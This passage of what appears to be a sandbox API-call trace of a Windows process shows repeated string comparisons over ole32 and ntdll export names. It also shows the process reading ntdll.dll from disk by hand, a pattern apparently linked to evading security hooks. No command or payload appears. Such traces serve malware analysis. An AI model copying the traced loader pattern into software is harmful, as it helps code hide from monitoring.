lpString2="CLIPFORMAT_UserSize64") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0128.052] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0128.052] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0128.053] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0128.053] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0128.054] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.054] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0128.055] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0128.055] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0128.055] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.055] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0128.056] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0128.074] GetProcessHeap () returned 0x430000 [0128.074] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4129040 | out: hHeap=0x430000) returned 1 [0128.315] GetProcessHeap () returned 0x430000 [0128.315] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449260 [0128.315] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0128.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0128.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0128.315] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0128.315] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0128.316] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0128.316] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0128.316] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0128.316] GetProcessHeap () returned 0x430000 [0128.316] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1bba48) returned 0x412b040 [0128.320] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0128.320] ReadFile (in: hFile=0x140, lpBuffer=0x412b040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x412b040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0128.341] CloseHandle (hObject=0x140) returned 1 [0128.341] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0128.341] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0128.341] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0128.341] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0128.341] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0128.341] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0128.341] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0128.341] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0128.341] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0128.341] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0128.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0128.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0128.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0128.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0128.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0128.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0128.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0128.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0128.344] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0128.344] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 